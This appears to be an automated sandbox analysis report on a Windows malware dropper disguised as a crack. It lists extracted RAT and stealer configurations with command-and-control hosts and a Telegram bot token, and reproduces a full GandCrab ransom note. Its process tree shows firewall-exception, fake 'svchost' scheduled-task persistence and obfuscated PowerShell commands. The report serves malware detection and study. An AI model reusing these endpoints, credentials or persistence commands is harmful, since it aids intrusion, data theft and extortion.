Analysis

  • max time kernel
    29s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    10-09-2024 05:57

General

  • Target

    クラック.exe

  • Size

    17.8MB

  • MD5

    61bcb94052e57f07e8c662a80d8c29c1

  • SHA1

    db9d2e9e37eddedc1722727e8ce5a0a242a9ff10

  • SHA256

    3b0cfdd500288507ec287e0e2f33d7acb7a2bcad1537fcfb29a47a4fa7cc23a6

  • SHA512

    7f9f9c2c6cd5dd49baf6791808e5a31c9e4726d27f87aaad8e2df75ab2a0dbf20956d0bab8761a9e742d1fa85052f9f7f0ae8e6cf269a0761053786e547935a1

  • SSDEEP

    49152:U6m1Vv6+nTCnjhT5iD1hTIUGzVnDk7Q3xCDza91PU3i/hv/kklWHvv7vTRZOp6/u:Um

Malware Config

Extracted

Family

njrat

Version

<- NjRAT 0.7d Horror Edition ->

Botnet

Victim

C2

great-it.gl.at.ply.gg:11149

Mutex

4d5861675348411506f0e029827092c2

Attributes
  • reg_key

    4d5861675348411506f0e029827092c2

  • splitter

    Y262SUCZ4UJJ

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

njrat

Version

im523

Botnet

puked

C2

147.185.221.20:47570

Mutex

20006afb0ec33f2e48c8c1f17d4d3382

Attributes
  • reg_key

    20006afb0ec33f2e48c8c1f17d4d3382

  • splitter

    |'|'|

Extracted

Family

njrat

Version

0.7d

Botnet

чучундра

C2

hakim32.ddns.net:2000

safety-bronze.gl.at.ply.gg:4444

Mutex

27b92504703b09d3ee2dae0873e8e3f3

Attributes
  • reg_key

    27b92504703b09d3ee2dae0873e8e3f3

  • splitter

    |'|'|

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

192.168.1.42:5552

Mutex

bf7b1fe7a7644171a9985ea45221c25c

Attributes
  • reg_key

    bf7b1fe7a7644171a9985ea45221c25c

  • splitter

    |'|'|

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

C2

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    -YFLE4M

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Path

C:\MSOCache\RILGMZE-DECRYPT.txt

Ransom Note
---= GANDCRAB V5.0.3 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE WILL BE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .RILGMZE The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/9a3b2757d6249e3a | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- wfKD6iudumBkmpL8IRr4U4exEVaoOXLtwDwmOrT1y1YWvOiWMx5GYaRdvZZSTptRpHYG7mhWsbfTTHeHhh5qBJzzs9MC7736UkGSDDniUJJG8/LFF//kmGmoAZAGLo2j5/wd2UrxMJK+iqKhTkS3ArgAxrZOOOiXrbnhbWMkLHQnbYuWlMClYZxYU6SDxpopRo5r292AV1KIZBZV4APBuUHcKSIr2MWMI0O1MKIP2IpKLE2TS5wLmpQodXZhP6M/UPrO1sZzkDbgjYlAG3g8l65nVd0/CBUxKQ7KDJYrtX0vSmnFXg/ykfgtJNiwqfCnqbr85+Bi6rEjkUvBsuKm/2E2FOshGo9YalqBBiPtpBGDEdob8CcE4oG4b6a1Y8ZyGoyp2Q2iuJRzTRoqGlPQJIAJppFrwNIoDBPOnKw+A+5ZALufjGEwg7NrKg3qxA9Kxg72ZibpDBFI3vTLM+aq1wQZLXRgRl+KCjmo1jngAX95mSffmizzQU1nmrIqlsew6HIMVY3pdDfwfAscdcBnP3FNhn9WQ3XC06ZCEvXtdUj8BYRMbJHwHowOP7+LRYsPy4knV/fu67PJzMP9LnZDh5szqewLRaRtAf+EbjLWu+IPXpBeLdQo9FRha1KO2vpgy2mFLQkzlAtXfjb5QmECiQ== ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/9a3b2757d6249e3a

Extracted

Family

lokibot

C2

http://45.133.1.20/oluwa/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • DcRat 64 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Async RAT payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • DCRat payload 6 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (305) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 36 IoCs
  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 5 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 25 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 18 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\クラック.exe
    "C:\Users\Admin\AppData\Local\Temp\クラック.exe"
    1⤵
    • DcRat
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
      "C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1960
    • C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe
      "C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2356
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fjff9bL8EP.bat"
        3⤵
          PID:3664
          • C:\Windows\system32\w32tm.exe
            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            4⤵
              PID:2312
            • C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\73c1c41b9e71c48e752a5cd19fe808b6.exe
              "C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\73c1c41b9e71c48e752a5cd19fe808b6.exe"
              4⤵
                PID:4004
          • C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe
            "C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"
            2⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2452
          • C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
            "C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2268
            • C:\Users\Admin\AppData\Local\Temp\server.exe
              "C:\Users\Admin\AppData\Local\Temp\server.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3616
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                4⤵
                • Modifies Windows Firewall
                PID:3820
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM Exsample.exe
                4⤵
                • Kills process with taskkill
                PID:2928
          • C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
            "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"
            2⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            PID:2896
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" ENABLE
              3⤵
              • Modifies Windows Firewall
              PID:2636
          • C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe
            "C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"
            2⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2480
          • C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
            "C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
            2⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2792
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
              "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
              3⤵
              • Command and Scripting Interpreter: PowerShell
              PID:1668
          • C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe
            "C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"
            2⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2620
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q3rpLXaa8e.bat"
              3⤵
                PID:3208
                • C:\Windows\system32\w32tm.exe
                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  4⤵
                    PID:1144
                  • C:\Program Files\Uninstall Information\WMIADAP.exe
                    "C:\Program Files\Uninstall Information\WMIADAP.exe"
                    4⤵
                      PID:3448
                • C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
                  "C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"
                  2⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2344
                • C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
                  "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1144
                  • C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
                    "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
                    3⤵
                    • Drops startup file
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops file in Program Files directory
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    PID:3872
                • C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe
                  "C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"
                  2⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Modifies registry class
                  • Suspicious use of WriteProcessMemory
                  PID:2980
                  • C:\Windows\winhlp32.exe
                    winhlp32.exe -x
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:316
                  • C:\Windows\winhlp32.exe
                    winhlp32.exe -x
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1028
                  • C:\Users\Admin\AppData\Local\Temp\fwclt.exe
                    C:\Users\Admin\AppData\Local\Temp\fwclt.exe C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe
                    3⤵
                    • Executes dropped EXE
                    PID:3824
                • C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
                  "C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
                  2⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1432
                • C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe
                  "C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:380
                • C:\Program Files (x86)\BTZ.exe
                  "C:\Program Files (x86)\BTZ.exe"
                  2⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Impair Defenses: Safe Mode Boot
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2388
                • C:\Program Files (x86)\Cat.exe
                  "C:\Program Files (x86)\Cat.exe"
                  2⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1064
                • C:\Program Files (x86)\Client.exe
                  "C:\Program Files (x86)\Client.exe"
                  2⤵
                  • Modifies WinLogon for persistence
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Windows directory
                  • Suspicious use of AdjustPrivilegeToken
                  PID:840
                  • C:\Windows\system32\CMD.exe
                    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
                    3⤵
                      PID:2644
                      • C:\Windows\system32\schtasks.exe
                        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
                        4⤵
                        • DcRat
                        PID:2068
                    • C:\Windows\system32\CMD.exe
                      "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
                      3⤵
                        PID:536
                        • C:\Windows\system32\schtasks.exe
                          SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
                          4⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:2232
                      • C:\Windows\system32\CMD.exe
                        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
                        3⤵
                          PID:2968
                          • C:\Windows\system32\schtasks.exe
                            SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
                            4⤵
                            • DcRat
                            PID:328
                        • C:\Windows\system32\CMD.exe
                          "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
                          3⤵
                            PID:2888
                            • C:\Windows\system32\schtasks.exe
                              SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
                              4⤵
                                PID:3700
                            • C:\Windows\system32\CMD.exe
                              "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
                              3⤵
                                PID:2980
                                • C:\Windows\system32\schtasks.exe
                                  SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
                                  4⤵
                                    PID:2364
                                • C:\Windows\system32\CMD.exe
                                  "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
                                  3⤵
                                    PID:3476
                                    • C:\Windows\system32\schtasks.exe
                                      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
                                      4⤵
                                      • DcRat
                                      PID:3916
                                  • C:\Windows\system32\CMD.exe
                                    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
                                    3⤵
                                      PID:2104
                                      • C:\Windows\system32\schtasks.exe
                                        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
                                        4⤵
                                        • DcRat
                                        PID:2864
                                    • C:\Windows\system32\CMD.exe
                                      "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
                                      3⤵
                                        PID:1236
                                        • C:\Windows\system32\schtasks.exe
                                          SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
                                          4⤵
                                          • DcRat
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2384
                                      • C:\Windows\system32\CMD.exe
                                        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
                                        3⤵
                                          PID:4044
                                          • C:\Windows\system32\schtasks.exe
                                            SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
                                            4⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3504
                                        • C:\Windows\system32\CMD.exe
                                          "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
                                          3⤵
                                            PID:3444
                                            • C:\Windows\system32\schtasks.exe
                                              SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
                                              4⤵
                                                PID:3304
                                            • C:\Windows\system32\CMD.exe
                                              "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
                                              3⤵
                                                PID:3740
                                                • C:\Windows\system32\schtasks.exe
                                                  SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
                                                  4⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:3528
                                            • C:\Program Files (x86)\Darkest Dungeon setub.exe
                                              "C:\Program Files (x86)\Darkest Dungeon setub.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:2236
                                              • C:\Users\Admin\AppData\Roaming\svhost.exe
                                                "C:\Users\Admin\AppData\Roaming\svhost.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3076
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svhost.exe" "svhost.exe" ENABLE
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:2464
                                            • C:\Program Files (x86)\evil.exe
                                              "C:\Program Files (x86)\evil.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
